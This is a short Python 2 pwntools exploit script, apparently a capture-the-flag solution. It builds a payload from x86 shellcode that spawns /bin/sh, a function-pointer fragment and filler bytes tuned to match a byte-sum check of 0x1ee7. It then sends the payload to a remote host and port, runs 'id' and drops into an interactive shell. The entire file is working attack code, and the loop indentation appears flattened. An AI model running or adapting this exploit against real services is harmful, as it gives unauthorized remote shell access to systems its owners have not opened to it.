#!/usr/bin/env python2
from pwn import * # https://pypi.python.org/pypi/pwntools
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('host')
parser.add_argument('port', type=int)
args = parser.parse_args()
context.log_level = 'debug'
read_len = 0x3d
funptr = "\x47\x47\xff\xe7"
cmp_sum = 0x1ee7
# http://shell-storm.org/shellcode/files/shellcode-827.php
shellcode = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" + \
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
xchg_edi_eax = "\x97"
payload = ["\xff", shellcode, xchg_edi_eax]
l = read_len - len(''.join(payload))
s = [1] * l
i = 0
measure = lambda: sum(map(ord,''.join(payload))) + sum(s) + sum(map(ord,funptr[1:]))
while measure() < cmp_sum:
d = cmp_sum - measure()
s[i] += min(255 - 1, d)
i += 1
payload.insert(2, ''.join(map(chr,s)))
payload = ''.join(payload)
log.info(repr(payload))
log.info(str(sum(map(ord,payload))))
p = remote(args.host, args.port)
p.recvline()
p.send(payload)
time.sleep(0.2)
p.sendline('id')
p.interactive()